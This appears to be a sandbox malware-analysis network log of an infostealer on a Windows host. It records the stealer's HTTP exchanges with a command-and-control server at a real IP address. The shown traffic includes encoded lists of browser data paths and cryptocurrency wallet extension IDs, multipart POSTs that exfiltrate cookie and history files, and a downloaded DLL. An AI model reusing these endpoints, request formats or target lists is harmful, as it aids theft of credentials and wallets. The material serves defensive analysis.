6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 7, 2024 04:12:01.352793932 CET	112	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFU
Nov 7, 2024 04:12:01.352806091 CET	944	IN	Data Raw: 51 53 56 63 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 44 64 54 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: QSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcXFByb2d
Nov 7, 2024 04:12:01.414993048 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="message"plugins------AFHDGDGIIDGCFIDHDHDH--
Nov 7, 2024 04:12:01.693391085 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 7, 2024 04:12:01.693413973 CET	112	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
Nov 7, 2024 04:12:01.693456888 CET	1236	IN	Data Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
Nov 7, 2024 04:12:01.693510056 CET	212	IN	Data Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8
Nov 7, 2024 04:12:01.693543911 CET	1236	IN	Data Raw: 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 Data Ascii: VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3w
Nov 7, 2024 04:12:01.693722963 CET	1236	IN	Data Raw: 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d Data Ascii: aWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGF
Nov 7, 2024 04:12:01.693736076 CET	1236	IN	Data Raw: 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 Data Ascii: aWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx
Nov 7, 2024 04:12:01.693747044 CET	636	IN	Data Raw: 62 57 70 69 59 6d 39 6e 5a 6d 6c 70 59 57 39 6d 63 47 68 69 61 6d 64 6a 61 47 68 38 4d 58 77 77 66 44 42 38 56 6d 56 75 62 32 30 67 56 32 46 73 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 Data Ascii: bWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1
Nov 7, 2024 04:12:01.694098949 CET	204	IN	Data Raw: 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 74 6f 61 47 70 6a 61 47 74 72 61 47 31 70 5a 32 64 68 61 32 6c 71 62 6d 74 6f 5a 6d 35 6b 66 44 46 38 4d 48 77 77 66 45 31 35 56 47 39 75 56 32 46 73 62 47 56 30 66 47 5a 73 5a 47 5a 77 5a 32 Data Ascii: bGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJkbm5pbG1jZGNnfDF8MHwwfA==
Nov 7, 2024 04:12:01.832613945 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="message"fplugins------IDHIEBAAKJDHIECAAFHC--
Nov 7, 2024 04:12:02.110482931 CET	335	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 7, 2024 04:12:02.126832008 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCF Host: 185.215.113.206 Content-Length: 5419 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:12:02.914609909 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:03.187480927 CET	94	OUT	GET /746f34465cf17784/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:03.463430882 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49755	185.215.113.206	80	6816	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:12:13.797049046 CET	202	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK Host: 185.215.113.206 Content-Length: 991 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:12:13.797133923 CET	991	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 7, 2024 04:12:15.201601028 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:15.304604053 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:12:15.304655075 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Nov 7, 2024 04:12:16.085413933 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:16.130263090 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"------GCAFCAFHJJDBFIECFBKE--
Nov 7, 2024 04:12:16.914035082 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:17.305532932 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="file"------IDBGHDGHCGHCAAKFIIEC--
